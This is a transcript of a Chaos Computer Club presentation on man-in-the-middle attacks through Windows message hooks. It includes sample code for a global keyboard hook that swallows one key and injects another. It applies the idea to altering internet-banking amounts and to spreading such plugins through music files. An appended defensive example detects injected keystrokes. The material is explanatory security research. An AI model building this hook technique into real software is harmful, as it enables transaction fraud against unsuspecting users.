
Attacking the User-Machine Interface - PowerPoint PPT Presentation

Attacking the User-Machine Interface. A speech from Volker Birk, dingens@bumens.org, Chaos Computer Club ERFA Kreis Ulm.


  1. Attacking the User-Machine Interface
     A speech from Volker Birk, dingens@bumens.org
     Chaos Computer Club ERFA Kreis Ulm
     http://www.ulm.ccc.de, http://www.ccc.de

  2. What's up?
     - Everybody searches for security for machine-machine interfaces.
     - Some implementations of cryptography are OK for now.
     - Nobody thinks about the security problems of the user-machine interfaces.
     CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  3. Example: internet-banking
     [Diagram: PC, Internet, Webserver, Mainframe at the bank. Caption: "I'm in! That was easy!"]

  4. The idea is not really new:

  5. How does the Windoze GUI work?
     - Windoze is a timesharing system
       - hardware drivers in the kernel, mostly interrupt driven
       - Processes and threads in the user land
     - Windoze is a message based GUI
       - System Message Queue -> System Dispatcher
       - -> Thread Message Queue -> Thread Dispatcher
       - -> WindowProc for every Window Class.

  6. How does the Windoze GUI work?
     [Diagram labels: "Click!", IRQ12, CPU, Driver, System-Message-Q, System Dispatcher, Thread-Message-Q, Translate, Thread Dispatcher, WM_NCHITTEST, WindowProc (Message Handler)]

  7. hello, world

     ```c
     #include <windows.h>

     /* InitApp is on the next slide; InitInstance is not shown in the slides. */
     int WINAPI WinMain(HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPSTR lpCmdLine,
                        int nCmdShow) {
         MSG msg;

         if (!hPrevInstance)
             InitApp(hInstance);
         InitInstance(hInstance, nCmdShow);

         /* Thread Dispatcher: take each message from the thread message
            queue and hand it to the WindowProc of its window class. */
         while (GetMessage(&msg, NULL, 0, 0) > 0) {
             TranslateMessage(&msg);
             DispatchMessage(&msg);
         }
         return (int)msg.wParam;
     }
     ```

  8. hello, world

     ```c
     ATOM InitApp(HINSTANCE hInstance) {
         WNDCLASSEX wcex;

         memset(&wcex, 0, sizeof(WNDCLASSEX));
         wcex.cbSize        = sizeof(WNDCLASSEX);
         wcex.style         = CS_HREDRAW | CS_VREDRAW;
         wcex.lpfnWndProc   = (WNDPROC) WndProc;   /* Message Handler */
         wcex.hInstance     = hInstance;
         wcex.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
         wcex.hCursor       = LoadCursor(NULL, IDC_ARROW);
         wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
         wcex.lpszClassName = "HelloWorldClass";

         return RegisterClassEx(&wcex);
     }
     ```

  9. hello, world

     ```c
     LRESULT CALLBACK WndProc(HWND hWnd, UINT message,
                              WPARAM wParam, LPARAM lParam) {
         PAINTSTRUCT ps;
         HDC hdc;
         RECT rt;

         switch (message) {
         case WM_PAINT:
             hdc = BeginPaint(hWnd, &ps);
             GetClientRect(hWnd, &rt);
             DrawText(hdc, "hello, world", 12, &rt, DT_CENTER);
             EndPaint(hWnd, &ps);
             break;
         case WM_LBUTTONDOWN:   /* the slide writes "WM_CLICK", which is not a Win32 message */
             /* ... */
             break;
         default:
             /* everything else goes to the default handler */
             return DefWindowProc(hWnd, message, wParam, lParam);
         }
         return 0;
     }
     ```

  10. The weak point: Hooks.
     - Message Hooks can be installed from any application before any message dispatcher.
     - Messages could be filtered or altered and transported to the Message Handlers.
     - Is there a security system? No, Sir.
     - Attacking pattern: Man in the middle attack.

  11. Man-In-The-Middle-Attack.
     [Diagram labels: "Click!", Windows, Message Hook, Application (i.e. IE for banking ;-)]

  12. Code sample

     ```c
     void InstallHook() {
         /* The hook procedure lives in a separate DLL. */
         m_hLib = LoadLibrary("Hook.dll");
         FARPROC pSysMsgProc = GetProcAddress(m_hLib, "KeyboardProc");
         PSETHOOKHANDLE pSetHookHandle =
             (PSETHOOKHANDLE) GetProcAddress(m_hLib, "SetInfo");

         /* Thread id 0: the keyboard hook is not tied to one thread. */
         m_hHook = SetWindowsHookEx(WH_KEYBOARD,
                                    (HOOKPROC) pSysMsgProc, m_hLib, 0);

         /* Give the DLL its hook handle for CallNextHookEx. */
         (*pSetHookHandle)(m_hHook);
     }
     ```

  13. Code sample

     ```c
     static HHOOK hHook = 0;

     void SetInfo(HHOOK newHook) { hHook = newHook; }

     LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam,
                                   LPARAM lParam) {
         if (nCode == HC_ACTION && wParam == VK_DECIMAL) {
             // hPlayback = SetWindowsHookEx(WH_JOURNALPLAYBACK,
             //     JournalPlaybackProc, theApp.m_hInstance, 0);
             if (lParam & 0x80000000)      /* bit 31 set: key is being released */
                 keybd_event(13502, 52, KEYEVENTF_KEYUP, 0);
             else
                 keybd_event(13502, 52, 0, 0);
             return 1;   /* non-zero: the original key message is not passed on */
         }
         return CallNextHookEx(hHook, nCode, wParam, lParam);
     }
     ```

  14. Being creative with internet banking
     - User enters "42", computer understands "23", user reads "42"
     - User is authenticating this transaction.
     - Computer is transacting "23".
     - With an Internet Explorer plugin we don't need any extra processes.
     - Distributing such plugins made easy by using music files with Windows XP.

  15. And now? What can we do?
     - Better forget Windows for banking purposes.
     - Better forget the Macintosh for banking purposes also.
     - X11 offers a security system. But who knows that and who is using it?
     - Better: cold boot from CD.

  16. Chaos Computer Club. Cable salad is healthy.
     Thank you!
     Volker Birk, CCC ERFA Kreis Ulm
     mailto:dingens@bumens.org
     http://www.ulm.ccc.de
     http://www.ccc.de
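The keystroke substitution in slides 12 and 13, seen from the defending side: an added example, not code from the talk. It audits a trace of low-level keyboard events for software-injected key presses; the `KeyEvent` struct, the `audit_trace` helper and the sample trace are assumptions made for illustration, with the flag bits taken from the `KBDLLHOOKSTRUCT.flags` values a `WH_KEYBOARD_LL` callback receives.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Bits of KBDLLHOOKSTRUCT.flags as seen by a WH_KEYBOARD_LL callback. */
#define KF_INJECTED 0x10u  /* LLKHF_INJECTED: made by keybd_event/SendInput */
#define KF_UP       0x80u  /* LLKHF_UP: key release */

/* Portable mirror of the fields used here (hypothetical type for this example). */
typedef struct { uint32_t vkCode, scanCode, flags; } KeyEvent;

typedef struct {
    size_t physical_down;   /* key presses that came from the keyboard */
    size_t injected_down;   /* key presses synthesized by software */
    long   first_injected;  /* index of the first injected event, -1 if none */
} Audit;

/* Audit a trace recorded while a sensitive field (e.g. a transfer amount)
 * has focus: any injected key press there is a finding. */
Audit audit_trace(const KeyEvent *ev, size_t n) {
    Audit a = {0, 0, -1};
    for (size_t i = 0; i < n; i++) {
        int injected = (ev[i].flags & KF_INJECTED) != 0;
        if (injected && a.first_injected < 0)
            a.first_injected = (long)i;
        if (ev[i].flags & KF_UP)
            continue;                        /* count presses, not releases */
        if (injected) a.injected_down++; else a.physical_down++;
    }
    return a;
}

/* Constructed trace: the user types '4' and the numpad decimal key; a hook
 * like the one on slide 13 answers the decimal key with a synthesized key
 * (0xBE assumed here, the low byte of the slide's 13502; scan code 52). */
static const KeyEvent SAMPLE[] = {
    {0x34, 0x05, 0x00}, {0x34, 0x05, KF_UP},  /* '4' down/up, physical */
    {0x6E, 0x53, 0x00},                       /* VK_DECIMAL down, physical */
    {0xBE, 52, KF_INJECTED},                  /* injected press */
    {0x6E, 0x53, KF_UP},                      /* VK_DECIMAL up, physical */
    {0xBE, 52, KF_INJECTED | KF_UP},          /* injected release */
};

int main(void) {
    Audit a = audit_trace(SAMPLE, sizeof SAMPLE / sizeof SAMPLE[0]);
    printf("physical=%zu injected=%zu first_injected=%ld\n",
           a.physical_down, a.injected_down, a.first_injected);
    return 0;
}
```

The flag marks only synthesized input: a hook that alters a message in place without re-injecting a key leaves no such trace, so a clean audit does not prove the input path is unhooked.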
